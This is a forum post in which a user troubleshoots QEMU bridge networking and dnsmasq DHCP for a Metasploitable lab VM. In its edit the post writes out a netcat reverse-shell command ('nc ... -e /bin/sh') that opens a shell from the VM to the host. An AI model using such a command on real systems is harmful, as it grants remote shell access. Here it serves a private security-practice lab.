You are not logged in.

Pages: 1

#1 2019-09-19 21:36:14

ExecutionByFork
Member
Registered: 2019-03-14
Posts: 9

Having trouble connecting to a VM running under qemu

I've set up a VM and gotten it running using qemu-system-x86_64 (detailed steps on my setup are below). I was able to successfully boot the VM, and I can ping the VM from the host, and ping the host from the VM. However, I cannot establish a netcat tcp session with the VM in either direction. Both the VM and host machine have any:any iptable rules, and because they can ping, they should be able to route traffic to each other over TCP/UDP as well.
The error I get via netat:

$ netcat -t 192.168.179.12:1337
Error: Couldn't resolve host "192.168.179.12:1337"

The above indicates something is probably messed up with the routing. I think the culprit may be DNS, and I say this because I have DHCP setup for the interface (bridge) the VM connects to. However, every time the VM boots it has the same IP address (192.168.179.12). Additionally, when running two copies of the VM (I have a .vmdk and .qcow2 image) both VMs have this same IP. This points to something not being set up properly with dnsmasq, though I need assistance in locating the exact problem so I can fix it, because I'm scratching my head and I admit networking isn't my strong suit.

My Setup
I've followed pretty closely along with the steps provided in this post here. I want the VM to only be able to communicate with the host, and not the internet.

The commands I ran to get to this point are as follows:

# Standing up the bridge interface
brctl addbr br0
ip addr add 192.168.179.1/24 broadcast 192.168.179.255 dev br0
ip link set br0 up

# Creating tap interfaces for the two individual VMs
ip tuntap add dev tap0 mode tap
ip link set tap0 up
ip tuntap add dev tap1 mode tap
ip link set tap1 up

# Linking the tap interfaces to the bridge
brctl addif br0 tap0
brctl addif br0 tap1

# Telling dnsmasq to dynamically assign IPs from a pool of 5 addresses
dnsmasq --interface=br0 --bind-interfaces --dhcp-range=192.168.179.10,192.168.179.15

# Running the VM
qemu-system-x86_64 -enable-kvm -m 1024 -netdev tap,id=t0,ifname=tap0,script=no,downscript=no -device e1000,netdev=t0,id=nic0 Metasploitable.qcow2 & disown

Checking netstat shows dnsmasq is running for the 192.168.179.X subnet

$ sudo netstat -lpun
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 127.0.0.1:53            0.0.0.0:*                           5110/dnsmasq        
udp        0      0 192.168.179.1:53        0.0.0.0:*                           5110/dnsmasq        
udp        0      0 0.0.0.0:67              0.0.0.0:*                           5110/dnsmasq        
udp        0      0 <my IPv4>:68            0.0.0.0:*                           203/NetworkManager  
udp6       0      0 ::1:53                  :::*                                5110/dnsmasq        
udp6       0      0 <my IPv6>:53            :::*                                5110/dnsmasq

EDIT:

$ nc -lvp 1337

and

nc <my IP> 1337 -e /bin/sh

opens a shell on the VM.

Lesson learned?
Always check your syntax kids (I overlooked this when I saw a routing error and immediately dove into researching dnsmasq before getting lost in the rabbit hole)

Though, this doesn't explain why my two VMs both have the same IP when DHCP is set up for them on the bridge... I could use some suggestions on where to look there, but at least I can connect to the thing now and play around with it.

Last edited by ExecutionByFork (2019-09-19 21:49:15)

Offline

Pages: 1

Board footer

Powered by FluxBB